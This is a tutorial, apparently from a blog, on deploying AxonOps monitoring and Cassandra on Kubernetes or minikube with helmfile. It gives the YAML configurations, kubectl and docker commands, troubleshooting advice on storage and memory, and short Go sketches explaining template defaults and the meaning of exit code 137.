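The helmfile.yaml that follows sets the namespace of two releases with the expression {{ env "NAMESPACE" | default "monitoring" }}. Helmfile renders the file as a Go template before reading it as YAML, so the expression resolves to the NAMESPACE environment variable, or to monitoring when that variable is unset or empty. The sketch below reproduces that behaviour with the standard text/template package. The two functions in the FuncMap are simplified stand-ins written for this example, not Helmfile's own implementations.

```go
package main

import (
	"fmt"
	"os"
	"strings"
	"text/template"
)

// renderNamespace evaluates the namespace expression from helmfile.yaml,
// using getenv to look up environment variables.
func renderNamespace(getenv func(string) string) (string, error) {
	funcs := template.FuncMap{
		// env returns the variable's value, or "" when it is unset.
		"env": getenv,
		// default receives the fallback first; the piped value arrives last.
		"default": func(fallback, value string) string {
			if value == "" {
				return fallback
			}
			return value
		},
	}
	const expr = `{{ env "NAMESPACE" | default "monitoring" }}`
	tmpl, err := template.New("namespace").Funcs(funcs).Parse(expr)
	if err != nil {
		return "", err
	}
	var out strings.Builder
	if err := tmpl.Execute(&out, nil); err != nil {
		return "", err
	}
	return out.String(), nil
}

func main() {
	ns, err := renderNamespace(os.Getenv)
	if err != nil {
		fmt.Println("template error:", err)
		return
	}
	fmt.Println("releases would be installed into namespace:", ns)
}
```

If you do export NAMESPACE, keep in mind that other parts of this walkthrough name the monitoring namespace directly, for example the hosts entry in axon-agent.yml and the kubectl commands, so they would need the same change.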

helmfile.yaml

---
repositories:
  - name: stable
    url: https://kubernetes-charts.storage.googleapis.com
  - name: incubator
    url: https://kubernetes-charts-incubator.storage.googleapis.com
  - name: axonops-helm
    url: https://repo.axonops.com/public/helm/helm/charts/
  - name: bitnami
    url: https://charts.bitnami.com/bitnami

releases:
  - name: axon-elastic
    namespace: {{ env "NAMESPACE" | default "monitoring" }}
    chart: "bitnami/elasticsearch"
    wait: true
    labels:
      env: minikube
    values:
      - fullnameOverride: axon-elastic
      - imageTag: "7.8.0"
      - data:
          replicas: 1
          persistence:
            size: 1Gi
            enabled: true
            accessModes: [ "ReadWriteOnce" ]
      - curator:
          enabled: true
      - coordinating:
          replicas: 1
      - master:
          replicas: 1
          persistence:
            size: 1Gi
            enabled: true
            accessModes: [ "ReadWriteOnce" ]

  - name: axonops
    namespace: {{ env "NAMESPACE" | default "monitoring" }}
    chart: "axonops-helm/axonops"
    wait: true
    labels:
      env: minikube
    values:
      - values.yaml

  - name: cassandra
    namespace: cassandra
    chart: "incubator/cassandra"
    wait: true
    labels:
      env: dev
    values:
      - values.yaml

values.yaml

---
persistence:
  enabled: true
  size: 1Gi
  accessMode: ReadWriteMany

podSettings:
  terminationGracePeriodSeconds: 300

image:
  tag: 3.11.6
  pullPolicy: IfNotPresent

config:
  cluster_name: minikube
  cluster_size: 3
  seed_size: 2
  num_tokens: 256
  max_heap_size: 512M
  heap_new_size: 512M

env:
  JVM_OPTS: "-javaagent:/var/lib/axonops/axon-cassandra3.11-agent.jar=/etc/axonops/axon-agent.yml"

extraVolumes:
  - name: axonops-agent-config
    configMap:
      name: axonops-agent
  - name: axonops-shared
    emptyDir: {}
  - name: axonops-logs
    emptyDir: {}
  - name: cassandra-logs
    emptyDir: {}

extraVolumeMounts:
  - name: axonops-shared
    mountPath: /var/lib/axonops
    readOnly: false
  - name: axonops-agent-config
    mountPath: /etc/axonops
    readOnly: true
  - name: axonops-logs
    mountPath: /var/log/axonops
  - name: cassandra-logs
    mountPath: /var/log/cassandra

extraContainers:
  - name: axonops-agent
    image: digitalisdocker/axon-agent:latest
    env:
      - name: AXON_AGENT_VERBOSITY
        value: "1"
    volumeMounts:
      - name: axonops-agent-config
        mountPath: /etc/axonops
        readOnly: true
      - name: axonops-shared
        mountPath: /var/lib/axonops
        readOnly: false
      - name: axonops-logs
        mountPath: /var/log/axonops
      - name: cassandra-logs
        mountPath: /var/log/cassandra

axon-server:
  elastic_host: http://axon-elastic-elasticsearch-master
  image:
    repository: digitalisdocker/axon-server
    tag: latest
    pullPolicy: IfNotPresent

axon-dash:
  axonServerUrl: http://axonops-axon-server:8080
  service:
    # use NodePort for minikube, change to ClusterIP or LoadBalancer on fully featured
    # k8s deployments such as AWS or Google
    type: NodePort
  image:
    repository: digitalisdocker/axon-dash
    tag: latest
    pullPolicy: IfNotPresent

axon-agent.yml

axon-server:
  hosts: "axonops-axon-server.monitoring" # Specify axon-server IP axon-server.mycompany.
  port: 1888

axon-agent:
  org: "minikube" # Specify your organisation name
  human_readable_identifier: "axon_agent_ip" # one of the following:

NTP:
  host: "pool.ntp.org" # Specify a NTP to determine a NTP offset

cassandra:
  tier0: # metrics collected every 5 seconds
    metrics:
      jvm_:
        - "java.lang:*"
      cas_:
        - "org.apache.cassandra.metrics:*"
        - "org.apache.cassandra.net:type=FailureDetector"

  tier1:
    frequency: 300 # metrics collected every 300 seconds (5m)
    metrics:
      cas_:
        - "org.apache.cassandra.metrics:name=EstimatedPartitionCount,*"

  blacklist: # You can blacklist metrics based on Regex pattern. Hit the agent on http://agentIP:9916/metricslist to list JMX metrics it is collecting
    - "org.apache.cassandra.metrics:type=ColumnFamily.*" # duplication of table metrics
    - "org.apache.cassandra.metrics:.*scope=Repair#.*" # ignore each repair instance metrics
    - "org.apache.cassandra.metrics:.*name=SnapshotsSize.*" # Collecting SnapshotsSize metrics slows down collection
    - "org.apache.cassandra.metrics:.*Max.*"
    - "org.apache.cassandra.metrics:.*Min.*"
    - ".*999thPercentile|.*50thPercentile|.*FifteenMinuteRate|.*FiveMinuteRate|.*MeanRate|.*Mean|.*OneMinuteRate|.*StdDev"

  JMXOperationsBlacklist:
    - "getThreadInfo"
    - "getDatacenter"
    - "getRack"

  DMLEventsWhitelist: # You can whitelist keyspaces / tables (list of "keyspace" and/or "keyspace.table" to log DML queries. Data is not analysed.
  # - "system_distributed"

  DMLEventsBlacklist: # You can blacklist keyspaces / tables from the DMLEventsWhitelist (list of "keyspace" and/or "keyspace.table" to log DML queries. Data is not analysed.
  # - system_distributed.parent_repair_history

  logSuccessfulRepairs: false # set it to true if you want to log all the successful repair events.

  warningThresholdMillis: 200 # This will warn in logs when a MBean takes longer than the specified value.

  logFormat: "%4$s %1$tY-%1$tm-%1$td %1$tH:%1$tM:%1$tS,%1$tL %5$s%6$s%n"

Start up

Create Axon Agent configuration

kubectl create ns cassandra
kubectl create configmap axonops-agent --from-file=axon-agent.yml -n cassandra

Run helmfile

With locally installed helm and helmfile

cd your/config/directory
helmfile sync

With docker image

docker run --rm \
    -v ~/.kube:/root/.kube \
    -v ${PWD}/.helm:/root/.helm \
    -v ${PWD}/helmfile.yaml:/helmfile.yaml \
    -v ${PWD}/values.yaml:/values.yaml \
    --net=host chatwork/helmfile sync

Access

Minikube

If you used minikube, identify the name of the service with kubectl get svc -n monitoring and launch it with

minikube service axonops-axon-dash -n monitoring

LoadBalancer

Find the DNS entry for it:

kubectl get svc -n monitoring -o wide

Open your browser and copy and paste the URL.

Troubleshooting

Check the status of the pods:

kubectl get pod -n monitoring

kubectl get pod -n cassandra

For any pod that is not in the Running state, inspect it with:

kubectl describe -n NAMESPACE pod POD-NAME

Storage

One common problem relates to storage. If you have enabled persistent storage, you may see an error about persistent volume claims (not found, unclaimed, etc.). If you are using minikube, make sure you enable storage with:

minikube addons enable storage-provisioner

Memory

The second most common problem is insufficient memory (OOMKilled). You will often see this if your node does not have enough memory to run the containers, or if the heap settings for Cassandra are not right. When this occurs, kubectl describe shows the container as terminated with reason OOMKilled and exit code 137.
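A container that exceeds its memory limit is stopped with SIGKILL, and a process ended by a signal is conventionally reported with exit code 128 plus the signal number, which is why an OOM kill appears as 137 (128 + 9). The small sketch below decodes an exit code along those lines. The function names are made up for this example, and the messages are only hints: a SIGKILL can have other causes, so treat the OOMKilled reason in the kubectl describe output as the authoritative sign.

```go
package main

import "fmt"

// sigKill is the number of SIGKILL, the signal used by the kernel OOM killer.
const sigKill = 9

// signalFromExitCode returns the signal number encoded in an exit code that
// follows the 128+N convention, or false for an ordinary exit code.
func signalFromExitCode(code int) (int, bool) {
	if code <= 128 {
		return 0, false
	}
	return code - 128, true
}

// explain turns an exit code into a short troubleshooting hint.
func explain(code int) string {
	sig, killed := signalFromExitCode(code)
	switch {
	case !killed:
		return fmt.Sprintf("exit code %d: the process exited by itself", code)
	case sig == sigKill:
		return fmt.Sprintf("exit code %d: SIGKILL, consistent with OOMKilled", code)
	default:
		return fmt.Sprintf("exit code %d: terminated by signal %d", code, sig)
	}
}

func main() {
	for _, code := range []int{1, 127, 137, 143} {
		fmt.Println(explain(code))
	}
}
```

By the same convention, exit code 143 corresponds to SIGTERM (15), which is what a container reports when it is stopped normally and does not handle the signal itself.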

In the values.yaml file, adjust the heap options to match your hardware:

max_heap_size: 512M
heap_new_size: 512M

Minikube

Review how you started minikube and assign more memory if you can. Also check the available drivers and select the most appropriate one for your platform. On macOS, where I tested, hyperkit and virtualbox are the best ones.

minikube start --memory 10240 --cpus=4 --driver=hyperkit

Putting it all together

]]>